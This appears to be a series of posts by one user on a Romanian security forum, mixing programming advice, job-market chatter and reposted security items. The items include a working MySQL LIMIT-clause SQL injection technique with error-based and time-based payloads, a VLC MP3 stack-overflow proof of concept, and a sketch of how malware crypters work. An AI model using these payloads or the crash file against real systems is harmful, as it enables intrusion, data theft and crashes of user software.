Nytro

Ti-a scapat

Vezi asta: https://ro.wikipedia.org/wiki/Automat_finit Cat despre "compilare", adica din cod sursa sa faci un executabil... Fa pentru inceput ceva simplu: 1. Creezi un automat finit 2. Procesezi un limbaj simplu Ex. write(123) Creezi o sintaxa bine pusa la punct. Mai exact, iei caracter cu caracter si: a. Ai o litera? Hmm, pare sa fie numele unei functii. Mergi mai departe b. Urmatorul caracter e "("? Inseamna ca s-a terminat numele functiei ("write") si urmeaza un parametru c. Urmatorul caracter e ")"? Inseama ca "123" e parametru pentru "write" Acestea sunt stari. Cele in cerculet sunt stari. Liniile inseamna procesare caracter cu caracter si starea in care se trece. De exemplu, din starea "functie", citesti o litera, te intorci in aceeasi stare si adaugi acea litera la numele functiei. Daca citesti insa caracterul "(" te duci in starea "param" si citesti cifra cu cifra valoarea. E un caz simplu de tot. Trebuie sa iei in considerare orice posibilitate si sa duci in starea de "eroare de compilare" daca ceva nu este in regula. 3. Dupa asta, interpretezi acel limbaj al tau. E frumos ce vrei sa faci dar poate fi complicat. Cauta despre teoria compilatoarelor, sunt multe articole, ce am zis eu e doar o idee, poate sa nu fie cea mai buna. Apoi, daca vrei "exe" trebuie sa transcrii din acel automat finit in limbaj de asamblare. Daca reusesti asta, o sa poti asambla in cod executabil, creezi un fisier PE (Portable Executable, strucutra exe) gol, pui Entrypoint catre o sectiune ".text" (sau ce nume vrei tu) care e "readable and executable" si acolo pui acel cod. Daca ai date, o sa iti trebuiasca o sectiune speciala. E prea complicat. Incearca ceva interpretat simplu, un script ca acel "write(123)". -------------------------------------------------------------------- Acum am vazut ce vrei sa faci de fapt. Un crypter functioneaza asa: 1. Ai un EXE deja creat 2. Pui "la final" sau "la interior" fisierul cryptat 3. Pui niste date de configurare, ca mai sus In acele date de configurare specifici encryptia si poate cheia. Sau ii pui o metoda de a primi cumva, de undeva, cheia de decryptare. Cat despre cum functioneaza un crypter, nu e asa simplu: trebuie sa incarci in memorie un executabil. Insa gasesti mult cod sursa din care poti invata, dar o sa iti ia ceva timp.

Se castiga mai bine pe SAP, sunt mai multe oportunitati pe Java. Alegerea e dificila.

SQL Injections in MySQL LIMIT clause Countless number of articles was written on the exploitation of SQL Injections. This post is dedicated to a very specific situation. When assessing the severity of SQL Injection in certain application, I encountered a problem, which I was not able to solve quickly using web search. It’s about a question if SQL injection vulnerability in the LIMIT clause in MySQL 5.x database is currently exploitable. Example query: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT injection_point [/TD] [/TR] [/TABLE] Of course, important is the fact that the above query contains ORDER BY clause. In MySQL we cannot use ORDER BY before UNION. If ORDER BY was not there it would be actually very easy to exploit it simply using just UNION syntax. The problem has appeared at stackoverflow and it was discussed at sla.ckers too. Sorry no results. So let’s look at the syntax of the SELECT in the MySQL 5 documentation [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 [/TD] [TD=class: crayon-code]SELECT [ALL | DISTINCT | DISTINCTROW ] [HIGH_PRIORITY] [sTRAIGHT_JOIN] [sql_SMALL_RESULT] [sql_BIG_RESULT] [sql_BUFFER_RESULT] [sql_CACHE | SQL_NO_CACHE] [sql_CALC_FOUND_ROWS] select_expr [, select_expr ...] [FROM table_references [WHERE where_condition] [GROUP BY {col_name | expr | position} [ASC | DESC], ... [WITH ROLLUP]] [HAVING where_condition] [ORDER BY {col_name | expr | position} [ASC | DESC], ...] [LIMIT {[offset,] row_count | row_count OFFSET offset}] [PROCEDURE procedure_name(argument_list)] [iNTO OUTFILE 'file_name' export_options | INTO DUMPFILE 'file_name' | INTO var_name [, var_name]] [FOR UPDATE | LOCK IN SHARE MODE]] [/TD] [/TR] [/TABLE] After the LIMIT clause may occur following clauses: PROCEDURE and INTO. This INTO clause is not interesting, unless the application uses a database account with permission to write files, which nowadays is rather rare situation in the wild. It turns out that it is possible to solve our problem using PROCEDURE clause. The only stored procedure available by default in MySQL is ANALYSE (see docs). Let’s give it a try: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 [/TD] [TD=class: crayon-code]mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1); ERROR 1386 (HY000): Can't use ORDER clause with this procedure [/TD] [/TR] [/TABLE] ANALYSE procedure can also take two parameters: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 [/TD] [TD=class: crayon-code]mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1); ERROR 1386 (HY000): Can't use ORDER clause with this procedure [/TD] [/TR] [/TABLE] Does not bode us well. Let’s see whether the parameters of ANALYSE are evaluated. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]mysql> SELECT field from table where id > 0 order by id LIMIT 1,1 procedure analyse((select IF(MID(version(),1,1) LIKE 5, sleep(5),1)),1); [/TD] [/TR] [/TABLE] gives us immediate response: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]ERROR 1108 (HY000): Incorrect parameters to procedure 'analyse’ [/TD] [/TR] [/TABLE] Therefore, sleep() is certainly not being called. I didn’t give up so fast and I finally found the vector: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 [/TD] [TD=class: crayon-code]mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1); ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1' [/TD] [/TR] [/TABLE] Voilà! The above solution is based on handy known technique of so-called error based injection. If, therefore, our vulnerable web application discloses the errors of the database engine (this is a real chance, such bad practices are common), we solve the problem. What if our target doesn’t display errors? Are we still able to exploit it successfully? It turns out that we can combine the above method with another well-known technique – time based injection. In this case, our solution will be as follows: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1) [/TD] [/TR] [/TABLE] It works. What is interesting that using SLEEP is not possible in this case. That’s why there must be a BENCHMARK instead. Update: As BigBear pointed out in the comment, very similar solution was actually posted earlier on rdot. Thanks! Update: It would be awesome if this technique is implemented in sqlmap. Sursa: https://rateip.com/blog/sql-injections-in-mysql-limit-clause/

Junior developer - 750 EUR, minim? Da, nu stiu ce sa zic.

Amuzant, haha, MUIE steaua! PS: Degeaba ascunzi IP in browser cand te conectezi pe 3306 cu IP real...

Macar de ai pune un titlu mai academic.

Laptop Gaming Asus ROG G771JW-T7091D cu procesor Intel® Core™ i7-4720HQ, 2.60GHz, Haswell™, 17.3", Full HD, IPS, 12GB, 1TB + SSD 256GB, Blu-Ray R, nVidia GeForce GTX 960M 4GB, Free DOS, Black - eMAG.ro Laptop Gaming Asus ROG G751JT-T7210D cu procesor Intel® Core™ i7-4720HQ 2.60GHz, Haswell™, 17.3", Full HD, IPS, 16GB, 1TB + SSD 128GB, Blu-Ray R, nVidia GeForce GTX 970M 3GB, Free DOS, Black - eMAG.ro

E mai rapid de scris in Python: import urllib2 response = urllib2.urlopen('http://python.org/') html = response.read() #include <winsock2.h> #include <windows.h> #include <iostream> #pragma comment(lib,"ws2_32.lib") using namespace std; int main (){ WSADATA wsaData; if (WSAStartup(MAKEWORD(2,2), &wsaData) != 0) { cout << "WSAStartup failed.\n"; system("pause"); return 1; } SOCKET Socket=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); struct hostent *host; host = gethostbyname("www.google.com"); SOCKADDR_IN SockAddr; SockAddr.sin_port=htons(80); SockAddr.sin_family=AF_INET; SockAddr.sin_addr.s_addr = *((unsigned long*)host->h_addr); cout << "Connecting...\n"; if(connect(Socket,(SOCKADDR*)(&SockAddr),sizeof(SockAddr)) != 0){ cout << "Could not connect"; system("pause"); return 1; } cout << "Connected.\n"; send(Socket,"GET / HTTP/1.1\r\nHost: www.google.com\r\nConnection: close\r\n\r\n", strlen("GET / HTTP/1.1\r\nHost: www.google.com\r\nConnection: close\r\n\r\n"),0); char buffer[10000]; int nDataLength; while ((nDataLength = recv(Socket,buffer,10000,0)) > 0){ int i = 0; while (buffer[i] >= 32 || buffer[i] == '\n' || buffer[i] == '\r') { cout << buffer[i]; i += 1; } } closesocket(Socket); WSACleanup(); system("pause"); return 0; }

VLC Mp3 parser stack overflow # Version: 2.2.1# Tested on: Windows 7 Professional 64 bits #APP: vlc.exe #ANALYSIS_VERSION: 6.3.9600.17336 (debuggers(dbg).150226-1500) amd64fre #MODULE_NAME: libvlccore #IMAGE_NAME: libvlccore.dll #FAILURE_ID_HASH_STRING: um:wrong_symbols_c00000fd_libvlccore.dll!vlm_messageadd #Exception Hash (Major/Minor): 0x60346a4d.0x4e342e62 #EXCEPTION_RECORD: ffffffffffffffff -- (.exr 0xffffffffffffffff) #ExceptionAddress: 00000000749ba933 (libvlccore!vlm_MessageAdd+0x00000000000910d3) # ExceptionCode: c00000fd (Stack overflow) # ExceptionFlags: 00000000 #NumberParameters: 2 # Parameter[0]: 0000000000000001 # Parameter[1]: 0000000025ed2a20 # #eax=00436f00 ebx=2fdc0100 ecx=25ed2a20 edx=00632efa esi=17fb2fdc edi=00000001 #eip=749ba933 esp=260cfa14 ebp=260cfa78 iopl=0 nv up ei pl nz na po nc #cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 # #Stack Overflow starting at libvlccore!vlm_MessageAdd+0x00000000000910d3 (Hash=0x60346a4d.0x4e342e62) # import eyed3 value = u'B'*6500000 audiofile = eyed3.load("base.mp3") audiofile.tag.artist = value audiofile.tag.album = u'andrea' audiofile.tag.album_artist = u'sindoni' audiofile.tag.save() Link: https://ghostbin.com/paste/x7kjh

Câ?i bani po?i câ?tiga ca IT-ist în România ?i care sunt cele mai c?utate limbaje de programare Florin Casota Postat la 20 octombrie 2015 Compania Brainspotting a dat publicit??ii un raport în care prezint? pia?a IT din România. Potrivit raportului sunt aproximativ 100.000 de speciali?ti IT&C la nivel na?ional, iar peste 90% dintre ei vorbesc engleza ?i 27% cunosc ?i limba francez?. În 2014, România a avut reprezentan?i la olimpiadele de informatic?, unde echipele au câ?tigat o medalie de aur ?i 3 de argint, într-o competi?ie la care au participat 11 ?ari. Cel mai mult se caut? speciali?ti în dezvoltarea de software (55%), testeri (QA-9%), Mobile Developers (iOS/Android-4%) etc, iar cel mai c?utat limbaj de programare este Java (28%), urmat de PHP (15%) ?i .Net/C# (15%), C/C++ (12%). Cele mai c?utate beneficii de speciali?ti IT din România sunt: asigurare medical? (64%), urmat de ore de lucru flexibile (49%), support financiar pentru training-uri (35%), bonusuri de Cr?ciun sau Pa?te (28%) ?i bonuri de mas? (28%). Cei mai mul?i dintre ace?tia accept? un job dac? ofer? ore de lucru flexibile (41%), urmat de salariu (38%) ?i de reputa?ia, imaginea companiei unde urmeaz? s? se angajeze (32%). În Bucure?ti sunt cei mai mul?i absolven?i IT&C (2000 pe an), în Cluj (1700), Ia?i ?i Timi?oara (1100). Dar ?i în ora?e precum Brasov, Sibiu sau Craiova se înregistreaz? o cre?tere a absolven?ilor în domeniul IT (500 la Bra?ov ?i Sibiu ?i 230 la Craiova). Salariile din domeniul IT&C în România încep de la 500 de euro/lun? pentru un post junior de Quality Assurance, iar cel mai mare salariu îl poate ob?ine un senior Mac iOS Developer sau un Big Data Analyst (2000-3500 de euro). Sursa: Câ?i bani po?i câ?tiga ca IT-ist în România ?i care sunt cele mai c?utate limbaje de programare - BusinessMagazin

Aveti grija, lucreaza la NSA!

Un adolescent de numai 16 ani din Cluj a reu?it s? fure peste 60.000 de lei din conturile clien?ilor de la mai multe b?nci. Conform anchetatorilor clujeanul ?i-ar fi început „meseria” de la 13 ani, dar pân? acum a fost iertat de autorit??i. Acesta este acuzat de s?vâr?irea a 13 (treisprezece) infrac?iuni de efectuare de opera?iuni financiare în mod fraudulos ?i a 3 (trei) infrac?iuni de tentativ? la efectuare de opera?iuni financiare în mod fraudulos, sub forma autoratului. „În perioada august – 15 septembrie 2015 inculpatul O. C.-I., în vârst? de 16 ani, a folosit în mod neautorizat date de identificare ale cardurilor bancare emise, dup? caz, de c?tre Banca Transilvania, Banca Comercial? Român?, Unicredit Bank, Millenium Bank ?i Marfin Bank Romania unui num?r de 16 (?aisprezece) titulari de pe întreg teritoriul României, efectuând sau încercând s? efectueze transferuri frauduloase de fonduri din conturile bancare ale acestora, în scopul achizi?ion?rii de produse de telecomunica?ii ?i IT (în special telefoane mobile de ultim? genera?ie), al transfer?rii de bani, al credit?rii unor conturi virtuale pentru convertirea monedei centralizate în moned? digital?, al reînc?rc?rii cartelelor telefonice precum ?i pentru achizi?ionarea de jocuri electronice”, scrie în rechizitoriu. În activitatea sa, inculpatul minor a încercat s? efectueze în mod fraudulos, în mediul online, tranzac?ii financiare în sum? total? de 96.210,18 lei ?i 40,48 dolari, reu?ind producerea un prejudiciu de 63.569,14 lei ?i 31,61 dolari, scrie romaniatv.net care citeaz? clujust.ro.. Dosarul a fost înaintat, spre competent? solu?ionare, Judec?toriei Cluj-Napoca. Sursa: Cluj: Un Hacker de doar 16 ani a furat peste 60.000 de lei din conturile mai multor clien?i - Cluj Capitala

Attention whores.

3. Nu am spus ca e singurul. Alte limbaje au binding-uri/wrappere, un overhead de performanta. 4. La fel ca mai sus, au diverse binding-uri/wrappere. In plus, fiind scrise in C/C++, tipurile de date ale parametrilor si valorilor returnate sunt cele din C/C++. In alte limbaje trebuie sa te adaptezi la aceste cerinte. Da, ai dreptate cu productivitatea, insa folosind diferite biblioteci poti avea productivitate. Vezi boost, are tot ce iti trebuie, cross-platform. "Limbajul cel mai folosit pentru aplicatii este de departe Delphi (peste 90%)." - Nici pe departe. Zi-mi 2-3 aplicatii mari scrise in Delphi. Cele mai folosite limbaje: Java, PHP, C++ (ordinea nu conteaza). Exemple: Microsoft Office, Google Chrome, Firefox, VLC, Antivirusi si extrem de multe altele - totul in C++ (sau C).

C++ + Python

Babun - a windows shell Would you like to use a linux-like console on a Windows host without a lot of fuzz? Try out babun! Have a look at a 2 minutes long screencast by @tombujok: Introduction to the Babun Project on Vimeo Installation Just download the dist file from http://babun.github.io, unzip it and run the install.bat script. After a few minutes babun starts automatically. The application will be installed to the %USER_HOME%\.babundirectory. Use the '/target' option to install babun to a custom directory. [TABLE=width: 728] [TR] [TD]Note[/TD] [TD]There is no interference with existing Cygwin installation[/TD] [/TR] [/TABLE] [TABLE=width: 728] [TR] [TD]Note[/TD] [TD]You may have "whitespace" chars in your username - it is not recommended by Cygwin though FAQ[/TD] [/TR] [/TABLE] Features in 10 seconds Babun features the following: Pre-configured Cygwin with a lot of addons Silent command-line installer, no admin rights required pact - advanced package manager (like apt-get or yum) xTerm-256 compatible console HTTP(s) proxying support Plugin-oriented architecture Pre-configured git and shell Integrated oh-my-zsh Auto update feature "Open Babun Here" context menu entry Have a look at a sample screenshot! Do you like it? Follow babun on Twitter @babunshell or @tombujok. Link: https://github.com/babun/babun

Copyleft of Simone 'evilsocket' Margaritelli*. bettercap - a complete, modular, portable and easily extensible MITM framework. bettercap is a complete, modular, portable and easily extensible MITM tool and framework with every kind of diagnostic and offensive feature you could need in order to perform a man in the middle attack. HOW TO INSTALL Stable Release ( GEM ) gem install bettercap From Source git clone https://github.com/evilsocket/bettercap cd bettercap gem build bettercap.gemspec sudo gem install bettercap*.gem DEPENDS All dependencies will be automatically installed through the GEM system, in some case you might need to install some system dependency in order to make everything work: sudo apt-get install ruby-dev libpcap-dev This should solve issues such as this one. EXAMPLES & INSTRUCTIONS Please refer to the official website. Sursa: https://github.com/evilsocket/bettercap

OpenSSH Win32 port of OpenSSH Look at the wiki for help Link: https://github.com/PowerShell/Win32-OpenSSH

De ce e "powerfull" C++: 1. cross-platform - Compilatoare atat open-source cat si comerciale 2. optimizat - Un limbaj interpretat nu va ajunge niciodata la viteza sa 3. capabil - Pointeri, mostenire, polimorfism si tot ce ti-ai putea dori de la un limbaj de programare 4. biblioteci - STL, Boost, OpenSSL si multe alte biblioteci sunt create pentru a fi folosite din C++ 5. stabil - Standard vechi, bine definit, implementat si inteles De ce nu e popular? 1. Nu e pentru cei slabi de inima.

It's on Youtube, it must be true.

E tema pentru mobile.

Advanced x86: Introduction to BIOS & SMM PC BIOS/UEFI firmware is usually “out of sight, out of mind”. But this just means it’s a place where sophisticated attackers can live unseen and unfettered. This class shares information about PC firmware security that was hard-won over years of focused research into firmware vulnerabilities. We will cover why the BIOS is critical to the security of the platform. This course will also show you what capabilities and opportunities are provided to an attacker when BIOSes are not properly secured. We will also provide you tools for performing vulnerability analysis on firmware, as well as firmware forensics. This class will take people with existing reverse engineering skills and teach them to analyze UEFI firmware. This can be used either for vulnerability hunting, or to analyze suspected implants found in a BIOS, without having to rely on anyone else. Learning Objectives * Understand the similarities and differences between the UEFI and legacy BIOS * Understand the BIOS/UEFI boot environments and how they interact with the platform architecture * How the BIOS/UEFI should configure the system to maximize platform security, and how attackers have bypassed these security mechanisms * How System Management Mode (SMM) is instantiated and must be protected * How SMM may be used to provide added layers of platform security * How the BIOS flash chip should be locked down, and what kind of attacks can be done when it is not * Learn how to Reverse Engineer UEFI modules * To teach you “how to fish” so you can take your newly-acquired knowledge to perform further security research in this area Link: IntroBIOS

Adobe Flash IExternalizable.writeExternal Type Confusion Authored by Google Security Research, natashenka If IExternalizable.writeExternal is overridden with a value that is not a function, Flash assumes it is a function even though it is not one. This leads to execution of a 'method' outside of the ActionScript object's ActionScript vtable, leading to memory corruption. Link: https://packetstormsecurity.com/files/134009/Adobe-Flash-IExternalizable.writeExternal-Type-Confusion.html

Da, deschid prima oara aplicatia, nu pot sa sterg un mail pana nu se incarca complet. Se incarca, sterg mail-ul, Inbox gol. Refresh, mail-ul e inca acolo. "Send feedback".